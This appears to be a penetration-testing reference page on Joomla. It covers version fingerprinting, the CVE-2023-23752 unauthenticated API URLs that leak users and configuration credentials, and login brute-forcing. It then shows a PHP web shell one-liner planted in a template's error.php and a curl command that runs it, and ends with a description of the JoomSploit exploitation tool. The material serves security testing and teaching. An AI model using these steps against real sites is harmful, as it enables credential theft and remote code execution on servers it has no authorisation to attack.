Joomla
Joomla collects some anonymous usage statistics, such as the breakdown of Joomla and PHP versions and the server operating systems in use on Joomla installations. This data can be queried via their public API.
Check the meta
robots.txt
README.txt
In /administrator/manifests/files/joomla.xml you can see the version.
In /language/en-GB/en-GB.xml you can get the Joomla version.
In plugins/system/cache/cache.xml you can see an approximate version.
In 80,443 - Pentesting Web Methodology there is a section about CMS scanners that can scan Joomla.
Versions from 4.0.0 to 4.2.7 are vulnerable to an unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.
Users: http://<host>/api/v1/users?public=true
Config file: http://<host>/api/index.php/v1/config/application?public=true
MSF module: scanner/http/joomla_api_improper_access_checks
or ruby script: 51334
You can use this script to attempt to brute force the login.
If you managed to get admin credentials, you can get RCE inside of it by adding a snippet of PHP code. We can do this by customizing a template.
Click on Templates on the bottom left under Configuration to pull up the templates menu.
Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:
system($_GET['cmd']);
Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Joomla Exploitation Script that elevates XSS to RCE or other critical vulnerabilities. For more info check this post. It provides support for Joomla Versions 5.X.X, 4.X.X, and 3.X.X, and allows to:
Privilege Escalation: Creates a user in Joomla.
(RCE) Built-In Templates Edit: Edits Built-In Templates in Joomla.
(Custom) Custom Exploits: Custom exploits for third-party Joomla plugins.